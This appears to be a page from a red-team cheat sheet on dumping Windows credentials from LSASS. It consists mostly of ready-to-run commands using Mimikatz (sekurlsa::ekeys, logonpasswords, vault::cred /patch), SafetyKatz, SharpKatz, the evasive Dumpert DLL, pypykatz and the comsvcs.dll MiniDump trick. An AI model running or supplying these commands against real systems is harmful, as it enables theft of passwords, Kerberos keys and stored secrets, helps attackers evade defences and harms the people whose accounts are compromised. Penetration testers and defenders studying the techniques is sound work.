Credentials Dumping

LSASS

Kerberos encryption keys

The Kerberos SSP used by LSASS in order to provide different authentication methods. Therefore, it possible to dump Kerberos encryption keys using sekurlsa::ekeys.

# Dump credentials on a local machine using Mimikatz.
Invoke-Mimikatz -Command '"sekurlsa::ekeys"' 

# Using SafetyKatz (Minidump of lsass and PELoader to run Mimikatz)
SafetyKatz.exe "sekurlsa::ekeys" 

# Dump credentials Using SharpKatz (C# port of some of Mimikatz functionality).
SharpKatz.exe --Command ekeys

# Dump credentials using Dumpert (Direct System Calls and API unhooking)
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

# Using pypykatz (Mimikatz functionality in Python)
pypykatz.exe live lsa

# Using comsvcs.dll
tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump
<lsass process ID> C:\Users\Public\lsass.dmp full 

Logon Passwords

This usually shows recently logged on user and computer credentials.

Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' 

Vault

Enumerates vault credentials of scheduled tasks.

Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'

Last updated

Was this helpful?